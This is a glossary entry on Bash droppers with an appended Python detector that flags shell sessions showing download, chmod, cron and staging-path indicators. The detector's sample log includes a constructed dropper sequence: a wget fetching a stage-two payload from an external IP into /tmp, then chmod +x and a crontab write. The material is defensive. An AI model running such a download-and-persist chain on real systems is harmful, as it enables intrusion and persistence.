

WIKICROOK

Bash dropper

A shell script that starts a multi-step attack chain by running additional commands or payloads.

A Bash dropper is a shell script used as the first step in an attack chain. Instead of doing all the malicious work itself, it runs additional commands, downloads payloads, decodes embedded data, or launches other scripts and binaries. Because Bash is built into many Linux and Unix systems, attackers can abuse it to execute code quickly without needing a custom installer.

This matters in cyber security because droppers help adversaries move from initial access to persistence, remote control, or data theft while keeping the visible script small. In real incidents, defenders may see Bash invoking tools such as curl or wget, changing file permissions, writing cron jobs, or spawning web shells and backdoors. Detection focuses on unexpected shell execution, unusual child processes, outbound connections, and file changes in temporary or web-accessible directories. Removing the first script is not enough if the dropper already staged later payloads elsewhere.
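The detection approach described above can be sketched as a small correlation check over process-creation events. This is an added example, not part of the original entry: the log format, field names, indicator patterns and threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict

# Constructed process-creation log lines (format and values made up for this example).
SAMPLE_LOG = """\
sid=101 parent=bash proc=wget cmd="wget -q -O /tmp/stage2.bin http://203.0.113.5/stage2"
sid=101 parent=bash proc=chmod cmd="chmod +x /tmp/stage2.bin"
sid=101 parent=bash proc=crontab cmd="crontab /tmp/cron.new"
sid=202 parent=bash proc=curl cmd="curl -sS https://example.org/health"
sid=303 parent=sshd proc=bash cmd="bash -l"
sid=303 parent=bash proc=chmod cmd="chmod 644 /home/dev/notes.txt"
"""

LINE = re.compile(r'sid=(\d+) parent=(\S+) proc=(\S+) cmd="(.*)"$')
SHELLS = {"bash", "sh", "dash"}
# Indicator patterns are assumptions derived from the behaviours the entry lists.
RULES = {
    "download_tool": re.compile(r"^(curl|wget)\b"),
    "make_executable": re.compile(r"^chmod\s+(\+x|[0-7]*[1357][0-7]*)\s"),
    "cron_write": re.compile(r"^crontab\s|/etc/cron|/var/spool/cron"),
    "staging_path": re.compile(r"(/tmp/|/var/tmp/|/dev/shm/|/var/www/)"),
}

def indicators(line):
    """Return (session id, set of rule names) for one shell-spawned process event."""
    m = LINE.match(line)
    if not m or m.group(2) not in SHELLS:
        return None, set()
    return m.group(1), {name for name, rx in RULES.items() if rx.search(m.group(4))}

def flag_sessions(log, threshold=3):
    """Flag sessions whose shell children show >= threshold distinct indicators."""
    seen = defaultdict(set)
    for line in log.splitlines():
        sid, hits = indicators(line)
        if sid:
            seen[sid] |= hits
    return {sid: sorted(h) for sid, h in seen.items() if len(h) >= threshold}

if __name__ == "__main__":
    for sid, hits in flag_sessions(SAMPLE_LOG).items():
        print(f"session {sid}: {', '.join(hits)}")
```

Correlating per session keeps a lone `curl` health check or an ordinary `chmod 644` from alerting, while a download, permission change and cron write in one shell session stand out together.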
